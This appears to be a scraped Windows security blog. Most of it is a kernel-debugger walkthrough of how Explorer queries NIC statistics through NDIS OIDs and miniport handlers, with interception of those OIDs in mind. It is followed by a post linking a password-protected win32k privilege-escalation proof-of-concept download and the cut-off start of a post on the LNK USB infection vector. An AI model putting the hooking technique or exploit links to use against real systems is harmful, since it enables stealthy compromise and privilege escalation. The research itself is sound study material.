src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggmFsTswic8tE4RMOP-WlHH8bzwINhbNH8vGVV9dnkOUB63hdKYXbEeIa8h9qDK0md0ypN292-yfDs4F5oAlmLX0otdXW2FGS1nqElfRJn04lxAggghlkQK87Nw1pFwhNA20Rl4KXwUSeZ/s640/diagram_explorer_retrieve_network_stats_from_nic.png" width="452" /></a></div><div style="text-align: center;"><u>Diagram Shows Explorer Retrieve Network Statistics from NIC</u></div><div style="text-align: left;"><u><br />
</u></div><ol start="3"><li>NdisQueryStatisticsOids</li>
<ul><li>What basically this function does is:</li>
</ul><ol><ol type="i"><li>Check the request info passed by <b>InputBuffer</b>, these info are OIDs that ontains the constants specifies the codes of the NDIS request.</li>
</ol></ol></ol><blockquote><blockquote><div style="text-align: left;"><span style="color: yellow; font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;">#define OID_GEN_MEDIA_IN_USE 0x00010104</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">#define OID_GEN_MEDIA_CONNECT_STATUS 0x00010114</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">#define OID_GEN_PHYSICAL_MEDIUM 0x00010202</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">#define OID_GEN_XMIT_OK 0x00020101</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">#define OID_GEN_RCV_OK 0x00020102</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">#define OID_GEN_XMIT_ERROR 0x00020103</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">#define OID_GEN_RCV_ERROR 0x00020104</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">#define OID_GEN_DIRECTED_BYTES_XMIT 0x00020201</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">#define OID_GEN_DIRECTED_BYTES_RCV 0x00020207</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">#define OID_GEN_DIRECTED_FRAMES_RCV 0x00020208</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">#define OID_GEN_INIT_TIME_MS 0x00020213</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">#define OID_GEN_RESET_COUNTS 0x00020214</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">#define OID_GEN_MEDIA_SENSE_COUNTS 0x00020215</span></span></div></blockquote></blockquote><ul><ul><li>The output will be stored in <b>OutputBuffer</b> and should look like this:</li>
</ul></ul> <span style="color: lime; font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;">01a0f86c 00010107 00000004 00989680 80010104</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 01a0f87c 00000004 00000000 80010114 00000004</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 01a0f88c 00000000 00020101 00000008 00000083</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 01a0f89c 00000000 00020102 00000008 000001d6</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 01a0f8ac 00000000 00020103 00000004 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 01a0f8bc 00020104 00000004 00000000 80020208</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 01a0f8cc 00000008 00000016 00000000 80020201</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 01a0f8dc 00000008 00002253 00000000 80020207</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 01a0f8ec 00000008 0000bd9d 00000000 80ffffff</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 01a0f8fc 00000004 00000588 80020213 00000004</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 01a0f90c 0000000f 80020214 00000004 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 01a0f91c 80020215 00000004 00000000 80010202</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 01a0f92c 00000004 00000000 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 01a0f93c 00000000 00000000 00000000 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 01a0f94c 00000000 00000000 00000002 00000002</span></span><br />
<br />
The structure of the output: <i>[[Request_OID][Output_Length][Output]]</i><br />
<br />
<ul><ul><li>Call <b>NDIS!NdisMDispatchRequest</b> which will then call the handler function to transfer the request to the NIC driver. The handler function is stored in one of the members of <b>NDIS_MINIPORT_CHARACTERISTICS</b>. </li>
</ul></ul><ol start="4"><li>QueryInformationHandler</li>
<ol type="i"><li>One of the handler functions store in <b>NDIS_MINIPORT_CHARACTERISTICS</b></li>
<li>it specifies the entry point of the caller's<b> MiniportQueryInformation</b> function <b></b></li>
<li>In order to find the <b>MiniportQueryInformation</b> address registered by the miniport driver (<b>\driver\vmxnet </b>in this case):<br />
<br />
<span style="color: yellow; font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;">kd> !drvobj \driver\vmxnet</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Driver object (81862f38) is for:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> \Driver\vmxnet</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Driver Extension List: (id , addr)</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> (4e4d4944 8197a600) </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Device Object list:</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 818627e0 </span></span></li>
<li>DriverObjectExtension = 8197a600, allocated by'<b>IoAllocateDriverObjectExtension</b> call within <b>NdisRegisterMiniportDriver</b> ndis.sys export function.</li>
<li>DriverObjectExtension is the driver specified structure, in this case the structure is called <b>NDIS_M_DRIVER_BLOCK</b> that store the miniport-ndis driver information: </li>
<span style="color: yellow; font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;">NDIS!_NDIS_M_DRIVER_BLOCK</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x000 NextDriver : Ptr32 _NDIS_M_DRIVER_BLOCK</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x004 MiniportQueue : Ptr32 _NDIS_MINIPORT_BLOCK</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x008 NdisDriverInfo : Ptr32 _NDIS_WRAPPER_HANDLE</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x00c AssociatedProtocol : Ptr32 _NDIS_PROTOCOL_BLOCK</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x010 DeviceList : _LIST_ENTRY</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x018 PendingDeviceList : Ptr32 _NDIS_PENDING_IM_INSTANCE</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x01c UnloadHandler : Ptr32 void </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x020 MiniportCharacteristics : _NDIS51_MINIPORT_CHARACTERISTICS</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x09c MiniportsRemovedEvent : _KEVENT</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x0ac Ref : _REFERENCE</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x0b4 Flags : Uint2B</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x0b8 IMStartRemoveMutex : _KMUTANT</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x0d8 DriverVersion : Uint4B</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> dt _NDIS51_MINIPORT_CHARACTERISTICS 817dfb50+20</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> NDIS!_NDIS51_MINIPORT_CHARACTERISTICS</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x000 MajorNdisVersion : 0x5 ''</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x001 MinorNdisVersion : 0 ''</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x002 Filler : 0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x004 Reserved : 0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x008 CheckForHangHandler : 0xf9cc5822 unsigned char +0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x00c DisableInterruptHandler : (null) </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x010 EnableInterruptHandler : (null) </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x014 HaltHandler : 0xf9cc73a6 void +0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> <span style="color: lime;">+0x018 HandleInterruptHandler : 0xf9cc6eec void +0</span> </span></span></ol><ol style="color: yellow; font-family: "Courier New",Courier,monospace;" type="i"><span style="font-size: x-small;"> +0x01c InitializeHandler : 0xf9cc676c int +0 +0x020 ISRHandler: 0xf9cc5678 void +0 <span style="color: lime;">+0x024 QueryInformationHandler : 0xf9cc5b58 int +0 </span></span></ol><ol type="i"><span style="color: yellow; font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;"> +0x028 ReconfigureHandler : (null) </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x02c ResetHandler : 0xf9cc589e int +0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x030 SendHandler : (null) </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x030 WanSendHandler : (null) </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x034 SetInformationHandler : 0xf9cc7448 int +0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x038 TransferDataHandler : (null) </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x038 WanTransferDataHandler : (null) </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x03c ReturnPacketHandler : 0xf9cc57e6 void +0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x040 SendPacketsHandler : 0xf9cc7662 void +0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x044 AllocateCompleteHandler : (null) </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x048 CoCreateVcHandler : (null) </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x04c CoDeleteVcHandler : (null) </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x050 CoActivateVcHandler : (null) </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x054 CoDeactivateVcHandler : (null) </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x058 CoSendPacketsHandler : (null) </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x05c CoRequestHandler : (null) </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x060 CancelSendPacketsHandler : (null) </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x064 PnPEventNotifyHandler : (null) </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x068 AdapterShutdownHandler : (null) </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x06c Reserved1 : (null) </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x070 Reserved2 : (null) </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x074 Reserved3 : (null) </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> +0x078 Reserved4 : (null) </span></span></ol></ol><br />
We intercept the following OIDs:<br />
<br />
<blockquote style="color: blue; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">#define OID_GEN_MEDIA_IN_USE 0x00010104</span><br />
<span style="font-size: x-small;">#define OID_GEN_MEDIA_CONNECT_STATUS 0x00010114</span><br />
<span style="font-size: x-small;">#define OID_GEN_PHYSICAL_MEDIUM 0x00010202</span><br />
<span style="font-size: x-small;">#define OID_GEN_XMIT_OK 0x00020101</span><br />
<span style="font-size: x-small;">#define OID_GEN_RCV_OK 0x00020102</span><br />
<span style="font-size: x-small;">#define OID_GEN_XMIT_ERROR 0x00020103</span><br />
<span style="font-size: x-small;">#define OID_GEN_RCV_ERROR 0x00020104</span><br />
<span style="font-size: x-small;">#define OID_GEN_DIRECTED_BYTES_XMIT 0x00020201</span><br />
<span style="font-size: x-small;">#define OID_GEN_DIRECTED_BYTES_RCV 0x00020207</span><br />
<span style="font-size: x-small;">#define OID_GEN_DIRECTED_FRAMES_RCV 0x00020208 </span><br />
<span style="font-size: x-small;">#define OID_GEN_INIT_TIME_MS 0x00020213</span><br />
<span style="font-size: x-small;">#define OID_GEN_RESET_COUNTS 0x00020214</span><br />
<span style="font-size: x-small;">#define OID_GEN_MEDIA_SENSE_COUNTS 0x00020215 </span></blockquote><br />
<span style="color: blue; font-size: x-large;">Extra Note</span><br />
<br />
<div style="color: black;"><span style="font-size: large;"><span style="font-size: small;">In Vista (or above), it uses <b>NDIS_MINIPORT_DRIVER_CHARACTERISTICS.OidRequestHandler</b> (Similar to <b>QueryInformationHandler</b>), for example in Vista vmware it uses Intel PRO/100 Network Interface Card:</span></span></div><div style="color: black;"><br />
</div><ul style="color: black;"><li><span style="font-size: large;"><span style="font-size: small;">NIC Driver (\Driver\E1G60) -> <b>E1G60I32!E1000Request</b>(NDIS_HANDLE MiniportAdapterContext, PNDIS_OID_REQUEST NdisRequest) </span></span></li>
</ul><blockquote style="color: yellow; font-family: "Courier New",Courier,monospace;"><span style="font-size: x-small;">kd> g<br />
E1G60I32!E1000Request:<br />
892b1046 8bff mov edi,edi<br />
<br />
kd> dd esp<br />
9bcfa6d4 85ccd3a4 8509b008 8948c1a8 85367868<br />
[MiniportAdapterContext][NdisRequest]<br />
<br />
kd> dd 8948c1a8 <span style="color: lime;">//PNDIS_OID_REQUEST</span><br />
8948c1a8 008c0196 00000002 00000000 00000000<br />
8948c1b8 00000000 00000000 00020102 838335d8<br />
8948c1c8 00000008 00000000 00000000 00000000<br />
8948c1d8 00000000 00000000 85367ac0 85367ac0<br />
<br />
typedef struct _NDIS_OID_REQUEST<br />
{<br />
//<br />
// Caller must set Header to<br />
// Header.Type = NDIS_OBJECT_TYPE_OID_REQUEST<br />
// Header.Revision = NDIS_OID_REQUEST_REVISION_1<br />
// Header.Size = NDIS_SIZEOF_OID_REQUEST_REVISION_1<br />
//<br />
NDIS_OBJECT_HEADER Header;<br />
NDIS_REQUEST_TYPE RequestType;<br />
NDIS_PORT_NUMBER PortNumber;<br />
UINT Timeout; // in Seconds<br />
PVOID RequestId;<br />
NDIS_HANDLE RequestHandle;<br />
<br />
//<br />
// OID - Information<br />
//<br />
union _REQUEST_DATA<br />
{<br />
struct _QUERY<br />
{<br />
NDIS_OID Oid;<br />
PVOID InformationBuffer;<br />
UINT InformationBufferLength;<br />
UINT BytesWritten;<br />
UINT BytesNeeded;<br />
} QUERY_INFORMATION;<br />
<br />
struct _SET<br />
{<br />
NDIS_OID Oid;<br />
PVOID InformationBuffer;<br />
UINT InformationBufferLength;<br />
UINT BytesRead;<br />
UINT BytesNeeded;<br />
} SET_INFORMATION;<br />
<br />
struct _METHOD<br />
{<br />
NDIS_OID Oid;<br />
PVOID InformationBuffer;<br />
ULONG InputBufferLength;<br />
ULONG OutputBufferLength;<br />
ULONG MethodId;<br />
UINT BytesWritten;<br />
UINT BytesRead;<br />
UINT BytesNeeded;<br />
} METHOD_INFORMATION;<br />
} DATA;<br />
//<br />
// NDIS Reserved<br />
//<br />
UCHAR NdisReserved[NDIS_OID_REQUEST_NDIS_RESERVED_SIZE * sizeof(PVOID)];<br />
UCHAR MiniportReserved[2*sizeof(PVOID)];<br />
UCHAR SourceReserved[2*sizeof(PVOID)];<br />
UCHAR SupportedRevision;<br />
UCHAR Reserved1;<br />
USHORT Reserved2;<br />
<br />
}NDIS_OID_REQUEST, *PNDIS_OID_REQUEST;</span></blockquote><ul><li><b>E1G60I32!E1000Request</b> > <b>_E1000QueryInformationSafe</b>(MiniportAdapterContext, Oid, InformationBuffer, InformationBufferLength, &BytesWritten, &BytesNeeded) </li>
<li>The following OIDs are checked:</li>
</ul><blockquote><span style="color: yellow; font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;">#define OID_GEN_XMIT_OK 0x00020101</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">#define OID_GEN_RCV_OK 0x00020102</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">#define OID_GEN_STATISTICS 0x00020106</span></span> </blockquote><ul><li><b>OID_GEN_STATISTICS</b> is the OID to obtain statistics of an adapter for NDIS >= 6.0 </li>
</ul><blockquote><span style="color: yellow; font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;">typedef struct _NDIS_STATISTICS_INFO {</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> NDIS_OBJECT_HEADER Header; <span style="color: lime;">// 0x00</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> ULONG SupportedStatistics; <span style="color: lime;">// 0x04</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> ULONG64 ifInDiscards; <span style="color: lime;">// 0x08</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> ULONG64 ifInErrors; <span style="color: lime;">// 0x10</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> ULONG64 ifHCInOctets; <span style="color: lime;">// 0x18</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> ULONG64 ifHCInUcastPkts; <span style="color: lime;">// 0x20</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> ULONG64 ifHCInMulticastPkts; <span style="color: lime;">// 0x28</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> ULONG64 ifHCInBroadcastPkts; <span style="color: lime;">// 0x30</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> ULONG64 ifHCOutOctets; <span style="color: lime;">// 0x38</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> ULONG64 ifHCOutUcastPkts; <span style="color: lime;">// 0x40</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> ULONG64 ifHCOutMulticastPkts; <span style="color: lime;"> // 0x48</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> ULONG64 ifHCOutBroadcastPkts; <span style="color: lime;"> // 0x50</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> ULONG64 ifOutErrors; <span style="color: lime;">// 0x58</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> ULONG64 ifOutDiscards; <span style="color: lime;"> // 0x60</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> ULONG64 ifHCInUcastOctets; <span style="color: lime;"> // 0x68</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> ULONG64 ifHCInMulticastOctets; <span style="color: lime;"> // 0x70</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> ULONG64 ifHCInBroadcastOctets; <span style="color: lime;">// 0x78</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> ULONG64 ifHCOutUcastOctets; <span style="color: lime;">// 0x80</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> ULONG64 ifHCOutMulticastOctets; <span style="color: lime;">// 0x88</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> ULONG64 ifHCOutBroadcastOctets; <span style="color: lime;">// 0x90</span></span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;">} NDIS_STATISTICS_INFO, *PNDIS_STATISTICS_INFO;</span></span></blockquote><br />
<span style="color: blue; font-size: x-large;">Demo</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUIffPQMIgzXQ656a4af320oCWwFlLBiLIuSPSJDAwy8toBIbfn6_NjUFtHEbZs1i8fNgsBg0V0Oe1ydPgkOmiYcBGx9dRsEsjoBEwQBab773FCZvwm7A8DhHMagLKxHZTEaswJaUG8sbY/s1600/vista_utltimate_rc-2010-12-02-22-16-25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUIffPQMIgzXQ656a4af320oCWwFlLBiLIuSPSJDAwy8toBIbfn6_NjUFtHEbZs1i8fNgsBg0V0Oe1ydPgkOmiYcBGx9dRsEsjoBEwQBab773FCZvwm7A8DhHMagLKxHZTEaswJaUG8sbY/s320/vista_utltimate_rc-2010-12-02-22-16-25.png" width="320" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiTLzATSudXIm1CDf18bY9g7TPzkCsGZ994V8Y2fNU5_Php0OGBT0DadQ7NMMw4Gd-pmAjQkqqIDh1Y8fNO0PFyXv868DmSL1KKe5EakMIIosAvAui3hxYBzkojIDec05A7spclNqIhiMK/s1600/vista_utltimate_rc-2010-12-02-22-16-44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiTLzATSudXIm1CDf18bY9g7TPzkCsGZ994V8Y2fNU5_Php0OGBT0DadQ7NMMw4Gd-pmAjQkqqIDh1Y8fNO0PFyXv868DmSL1KKe5EakMIIosAvAui3hxYBzkojIDec05A7spclNqIhiMK/s320/vista_utltimate_rc-2010-12-02-22-16-44.png" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjABtvkTwY459eSgkmmByDmViuH941rVNccYUnqTz0wZSDSNM1RNAAJSNyuLXCDiGjjbiFVYTbtOF-H7D8e-OCO9tt2wOvApfF6972lFeqfyWSiZOyNRYka4OpqLc3AVn37EK0j_2I9bIP2/s1600/vista_utltimate_rc-2010-12-02-22-14-54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjABtvkTwY459eSgkmmByDmViuH941rVNccYUnqTz0wZSDSNM1RNAAJSNyuLXCDiGjjbiFVYTbtOF-H7D8e-OCO9tt2wOvApfF6972lFeqfyWSiZOyNRYka4OpqLc3AVn37EK0j_2I9bIP2/s320/vista_utltimate_rc-2010-12-02-22-14-54.png" width="320" /> </a> </div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiTLzATSudXIm1CDf18bY9g7TPzkCsGZ994V8Y2fNU5_Php0OGBT0DadQ7NMMw4Gd-pmAjQkqqIDh1Y8fNO0PFyXv868DmSL1KKe5EakMIIosAvAui3hxYBzkojIDec05A7spclNqIhiMK/s1600/vista_utltimate_rc-2010-12-02-22-16-44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiTLzATSudXIm1CDf18bY9g7TPzkCsGZ994V8Y2fNU5_Php0OGBT0DadQ7NMMw4Gd-pmAjQkqqIDh1Y8fNO0PFyXv868DmSL1KKe5EakMIIosAvAui3hxYBzkojIDec05A7spclNqIhiMK/s320/vista_utltimate_rc-2010-12-02-22-16-44.png" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUIffPQMIgzXQ656a4af320oCWwFlLBiLIuSPSJDAwy8toBIbfn6_NjUFtHEbZs1i8fNgsBg0V0Oe1ydPgkOmiYcBGx9dRsEsjoBEwQBab773FCZvwm7A8DhHMagLKxHZTEaswJaUG8sbY/s1600/vista_utltimate_rc-2010-12-02-22-16-25.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="193" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUIffPQMIgzXQ656a4af320oCWwFlLBiLIuSPSJDAwy8toBIbfn6_NjUFtHEbZs1i8fNgsBg0V0Oe1ydPgkOmiYcBGx9dRsEsjoBEwQBab773FCZvwm7A8DhHMagLKxHZTEaswJaUG8sbY/s320/vista_utltimate_rc-2010-12-02-22-16-25.png" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><br />
</div><span style="color: blue;"><span style="font-size: large;"> </span></span> <br />
Signing off @x9090x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com3tag:blogger.com,1999:blog-1022731470813881575.post-27900697312956545102010-11-26T00:20:00.001+08:002010-11-26T00:21:48.596+08:00win32!NtGdiEnableEudc Vulnerability & POC on Windows Vista/7There is a latest 0-day vulnerability found on win32k.sys on Windows Vista/7 by a Chinese hacker with nick name 'noobpwnftw'.<br />
<br />
The vulnerability was published publicly on a well known programming website and it had been taken down. For the sake of education and researching, I'll post a local copy here.<br />
<br />
Have fun! :)<br />
<br />
<a href="http://www.4shared.com/file/TH0lfOd7/Bypassing_UAC_with_User_Privil.html">Download here</a><br />
<br />
Email me to for the archive's password.<br />
<br />
<a href="http://i65.photobucket.com/albums/h223/nofear0720/cooltext66147613.gif" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="25" src="http://i65.photobucket.com/albums/h223/nofear0720/cooltext66147613.gif" width="200" /></a><br />
<br />
Signing off @x9090x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com0tag:blogger.com,1999:blog-1022731470813881575.post-68808094845706340232010-07-25T23:51:00.004+08:002010-07-26T00:32:21.504+08:00Microsoft Shortcut LNK Autoexecution Vulnerability<span style="font-size: x-large;"><b>M</b><span style="font-size: small;"><b>icrosoft <span style="font-size: x-large;">S<span style="font-size: small;">hortcut <span style="font-size: x-large;">L<span style="font-size: small;">NK <span style="font-size: x-large;">A<span style="font-size: small;">utoexecution <span style="font-size: x-large;">V<span style="font-size: small;">ulnerability </span></span></span></span></span></span></span></span></b></span></span><br />
<br />
This is a new USB infection vector using LNK (shortuct) vulnerability on <b>ALL </b>Windows platform.<br />
<br />
